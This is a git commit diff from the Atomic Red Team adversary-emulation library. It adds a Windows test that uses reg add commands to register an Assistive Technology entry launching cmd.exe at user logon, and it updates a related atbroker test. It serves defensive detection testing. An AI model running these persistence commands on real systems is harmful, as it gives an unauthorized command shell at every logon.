Generated docs from job=generate-docs branch=master [ci skip]

2024-07-24 14:41:19 +00:00
parent af560d5067
commit bee5a4c48f
12 changed files with 149 additions and 20 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1620-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1621-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
@@ -775,6 +775,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -1141,6 +1142,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attach
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -537,6 +537,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -784,6 +785,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attach
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -1023,6 +1023,7 @@
  - Atomic Test #2: Replace binary of sticky keys [windows]
  - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
  - Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
+  - Atomic Test #5: Auto-start application on user logon [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
  - Atomic Test #1: Process Injection via C# [windows]
  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1542,6 +1543,7 @@
  - Atomic Test #2: Replace binary of sticky keys [windows]
  - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
  - Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
+  - Atomic Test #5: Auto-start application on user logon [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -727,6 +727,7 @@
  - Atomic Test #2: Replace binary of sticky keys [windows]
  - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
  - Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
+  - Atomic Test #5: Auto-start application on user logon [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
  - Atomic Test #1: Process Injection via C# [windows]
  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1080,6 +1081,7 @@
  - Atomic Test #2: Replace binary of sticky keys [windows]
  - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
  - Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
+  - Atomic Test #5: Auto-start application on user logon [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -40261,14 +40261,34 @@ privilege-escalation:
      - windows
      executor:
        command: |
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
          atbroker /start malware_test
        cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+          /f

          '
        name: command_prompt
+        elevation_required: true
+    - name: Auto-start application on user logon
+      auto_generated_guid: 7125eba8-7b30-426b-9147-781d152be6fb
+      description: |
+        Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
+        This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /t REG_SZ /d malware_test /f
+        cleanup_command: |
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
+        name: command_prompt
+        elevation_required: true
  T1055.004:
    technique:
      x_mitre_platforms:
@@ -63827,14 +63847,34 @@ persistence:
      - windows
      executor:
        command: |
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
          atbroker /start malware_test
        cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+          /f

          '
        name: command_prompt
+        elevation_required: true
+    - name: Auto-start application on user logon
+      auto_generated_guid: 7125eba8-7b30-426b-9147-781d152be6fb
+      description: |
+        Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
+        This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /t REG_SZ /d malware_test /f
+        cleanup_command: |
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      modified: '2024-02-01T04:37:36.774Z'
@@ -33621,14 +33621,34 @@ privilege-escalation:
      - windows
      executor:
        command: |
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
          atbroker /start malware_test
        cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+          /f

          '
        name: command_prompt
+        elevation_required: true
+    - name: Auto-start application on user logon
+      auto_generated_guid: 7125eba8-7b30-426b-9147-781d152be6fb
+      description: |
+        Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
+        This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /t REG_SZ /d malware_test /f
+        cleanup_command: |
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
+        name: command_prompt
+        elevation_required: true
  T1055.004:
    technique:
      x_mitre_platforms:
@@ -53143,14 +53163,34 @@ persistence:
      - windows
      executor:
        command: |
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
-          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
          atbroker /start malware_test
        cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+          /f

          '
        name: command_prompt
+        elevation_required: true
+    - name: Auto-start application on user logon
+      auto_generated_guid: 7125eba8-7b30-426b-9147-781d152be6fb
+      description: |
+        Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
+        This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /t REG_SZ /d malware_test /f
+        cleanup_command: |
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      modified: '2024-02-01T04:37:36.774Z'
@@ -26,6 +26,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi

 - [Atomic Test #4 - Atbroker.exe (AT) Executes Arbitrary Command via Registry Key](#atomic-test-4---atbrokerexe-at-executes-arbitrary-command-via-registry-key)

+- [Atomic Test #5 - Auto-start application on user logon](#atomic-test-5---auto-start-application-on-user-logon)
+

 <br/>

@@ -180,19 +182,56 @@ Executes code specified in the registry for a new AT (Assistive Technologies).



-#### Attack Commands: Run with `command_prompt`! 
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
-reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
-reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
 atbroker /start malware_test
 ```

 #### Cleanup Commands:
 ```cmd
-reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Auto-start application on user logon
+Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
+This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7125eba8-7b30-426b-9147-781d152be6fb
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /t REG_SZ /d malware_test /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
+reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
 ```


@@ -104,6 +104,7 @@ atomic_tests:
    name: command_prompt
    elevation_required: true
 - name: Auto-start application on user logon
+  auto_generated_guid: 7125eba8-7b30-426b-9147-781d152be6fb
  description: |
    Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
    This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
@@ -1659,3 +1659,4 @@ f2915249-4485-42e2-96b7-9bf34328d497
 cfe6315c-4945-40f7-b5a4-48f7af2262af
 5cb0b071-8a5a-412f-839d-116beb2ed9f7
 46ed938b-c617-429a-88dc-d49b5c9ffedb
+7125eba8-7b30-426b-9147-781d152be6fb